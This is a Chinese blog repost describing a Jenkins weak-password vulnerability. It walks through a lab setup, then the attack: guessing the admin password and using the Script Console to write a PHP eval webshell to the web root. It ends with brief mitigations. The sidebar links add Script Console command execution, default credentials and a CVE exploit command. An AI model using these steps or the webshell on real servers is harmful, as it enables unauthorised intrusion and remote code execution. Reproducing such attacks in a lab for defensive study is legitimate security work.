jenkins弱口令漏洞

最新推荐文章于 2024-06-22 22:24:24 发布
最新推荐文章于 2024-06-22 22:24:24 发布
阅读量1.4k 收藏
点赞数
文章标签: 运维 php shell
原文链接:http://www.cnblogs.com/yuzly/p/11255544.html
版权

jenkins弱口令漏洞

一、漏洞描述

通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。

二、漏洞环境搭建

1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io

2、在redhat6.5上安装jenkins

2.1、使用rpm安装

rpm -ivh jenkins-2.50-1.1.noarch.rpm

  

2.2、启动服务

  

2.3、浏览器访问http://192.168.10.137:8080,如下图所示需要输入密码,密码文件在如下图位置

   

2.4查看密码文件,输入密码后进入如下界面,选择安装建议的插件

  

2.5、安装完插件之后,进入如下界面,设置用户名和密码

  

2.6、设置完用户和密码之后,进入如下界面,点击如下图位置,到此为止,jenkins环境搭建成功

  

   

三、漏洞复现

1、浏览器访问http://192.168.10.137:8080

  

2、猜解出密码,然后登录,点击”系统管理”

  

3、选择如下图所示

  

4、利用”脚本命令行”上传webshell,内容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

  

5、点击“运行”,没有报错,上传成功

6、菜刀连接

  

四、漏洞防御

1、增强后台密码强度

2、后台不对外开放

 

-------------------------------------------------------------------------------

参考链接:https://www.secpulse.com/archives/2166.html

转载于:https://www.cnblogs.com/yuzly/p/11255544.html

WY92139010
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins弱口令RCE
weixin_44508748的博客
12-14 705
http://www.x.x.x.x:8080/script println 'id' .execute.text
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2784
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
【护网必备】Jenkins综合漏洞的利用工具
Fly_鹏程万里
05-31 370
CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1。CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897。本开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。
Jenkins弱口令扫描器
weixin_34162629的博客
08-01 618
Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 默认地Jenkins不包含任何的安全检查,如果未做好权限控制,可以通过其中一个未授权的命令执行获取服务器权限。当然如果配置了授权访问和资源访问权限设置,也可以批量抓取用户名进行暴力破解(有可能产生告警信息)。 由于Jenkins版本不同,因此抓取用户列表的CG...
web中间件漏洞-Jenkins漏洞-弱口令、反弹shell
最新发布
Alsn86的博客
06-22 468
默认用户一般为jenkins/jenkins使用admin/admin123登陆成功。
jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 949
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
jenkins集成OWSAP ZAP插件方法
01-26
Jenkins是一款流行的自动化构建工具,通过集成OWASP ZAP插件,可以实现自动化安全漏洞扫描,提高软件开发过程中的安全性。本文将详细介绍如何在Jenkins中集成OWASP ZAP插件,实现自动化安全漏洞扫描。 一、准备工作...
jenkins老版本资源
11-09
6. 版本回溯和升级策略:在使用 Jenkins 的老版本时,应考虑版本回溯的风险,比如安全漏洞和失去新功能。如果有必要升级,应该先在非生产环境进行测试,确保所有插件和构建脚本仍然有效,然后再逐步推广到生产环境。...
jenkins全套插件
05-14
jenkins离线安装全套插件,包含war包和jenkins适配的常用插件。只需要下载解压,运行jenkins.war,然后将plugins复制到jenkins_home目录下,一般都是/root/.jenkins
Jenkins打包插件配置
03-12
**Jenkins打包插件配置详解** 在持续集成和持续部署(CI/CD)的领域中,Jenkins扮演着至关重要的角色。它是一个开源的、高度可扩展的自动化服务器,广泛用于构建、测试和部署软件。其中,Jenkins的插件系统是其强大...
Jenkins安卓客户端
04-19
**Jenkins安卓客户端详解** Jenkins是一款开源的持续集成(Continuous Integration, CI)服务器,它在软件开发领域中被广泛用于自动化各种任务,包括构建、测试和部署。Jenkins安卓客户端则是为了让用户能够通过...
Jenkins漏洞导致Linux被挖矿
liar_____的博客
04-07 2486
问题发现 2022-4-7 14:05:00 腾讯云报警CPU100%。 问题处理 2022-4-7 14:08:00 查找高CPU进程,发现是Jenkins上有一个服务正在消耗CPU。而且该服务无法停止,只能进行删除。CPU回归正常。 原因查找 腾讯云监控显示:2022-4-7 00:45:00——2022-4-7 14:19:00时间段内CPU占用100%。 1)、查找登录日志发现有异常,疑似暴力破解root密码。 2)、无法查找2022-4-7 00:45:00左右访问Jenkins的..
jenkins使用SSH自动发布到远程服务器的注意事项
鬼小生
07-21 642
1.配置远程服务器 在我们的全局配置里配置SSH服务器时, 这个地方写我们服务器接收的根路径。 2.部署项目配置SSH传输文件的问题(重点) 下图是我们填写的正确方式,下面我做详细介绍: a.使用mavne打包发布后端项目的时候,我们构建完成后选择:Send files or execute commands over SSH b.Source file写的是相对路径,指的是你想发布的包在当前路径下的相对路径,我的实际打成功的包存放的路径为:/var/lib/jenkins/wor.
[应用漏洞]Jenkins
不忘初心,护天下安全!
08-09 525
漏洞又遇到了,暂且把待学习的文章写一下,等不及我消化的童鞋直接看链接吧: https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 ...
Jenkins插件存有安全威胁造成密码外泄或跨站攻击
weixin_34195142的博客
05-06 533
安全研究人员发现,100多只Jenkins插件存在安全漏洞,可能引发登入数据外泄或是跨网站攻击等安全风险。Jenkins是一种支持开发、部署和自动化软件开发的开源工具,可以外挂扩充以便提供Active Directory验证或执行静态程序分析、将组译好的软件复制到CIFS 网络文件系统等重复性作业。和Wordpress一样,Jenkins在第三方开发商的投入下,现有上百种外挂。但NCC Group...
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4515
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
Jenkins】未授权访问漏洞
qq_50854662的博客
07-08 1737
Jenkins】未授权访问漏洞
jenkins 的默认用户名和密码,及启动方法
热门推荐
neymar_jr的博客
01-04 8万+
Jenkins ,构建
jenkins默认密码重置
明确目标,明白做事,努力就有机会。
08-02 6055
Jenkins专有用户的数据存放在JENKINS_HOME/users目录。路径如图所示: 打开文件config.xml,找到&lt;passwordHash&gt;节点,如图: 可修改成加密串:#jbcrypt:$2a$10$DdaWzN64JgUtLdvxWIflcuQu2fgrrMSAMabF5TSrGK5nXitqK9ZMS 重启后密码及修改成功,为:111111  登录名a...
jenkins 漏洞如何排查
02-01
Jenkins是一个开源的持续集成和交付工具,它提供了丰富的功能和插件来帮助开发团队自动化构建、测试和部署软件项目。然而,由于Jenkins的广泛使用和开放的插件生态系统,可能存在一些安全漏洞。下面是一些排查Jenkins漏洞的常见方法: 1. 定期更新Jenkins和插件:及时更新Jenkins和其插件是防止漏洞利用的重要步骤。Jenkins官方会发布安全更新,你可以通过Jenkins的管理界面或者命令行工具进行更新。 2. 审查Jenkins日志:Jenkins会生成详细的日志记录,包括构建过程、插件使用等信息。通过审查日志,你可以发现异常行为或者异常请求,从而判断是否存在漏洞。 3. 使用安全扫描工具:可以使用一些专门的安全扫描工具来扫描Jenkins服务器,以发现潜在的漏洞。例如,可以使用OWASP ZAP、Nessus等工具进行漏洞扫描。 4. 配置访问控制:确保Jenkins的访问权限设置正确,只有授权的用户可以访问和执行敏感操作。可以使用Jenkins提供的RBAC(Role-Based Access Control)插件来管理用户权限。 5. 审查插件的安全性:Jenkins的插件生态系统非常丰富,但并不是所有插件都是安全可靠的。在选择和使用插件时,要注意查看插件的评级、下载量、最近更新时间等信息,选择受信任的插件。 6. 监控系统行为:通过监控Jenkins服务器的系统行为,例如网络流量、CPU和内存使用情况等,可以及时发现异常活动或者资源消耗异常的情况。 7. 参考安全建议和最佳实践:Jenkins官方提供了一些安全建议和最佳实践,可以参考官方文档来加强Jenkins的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值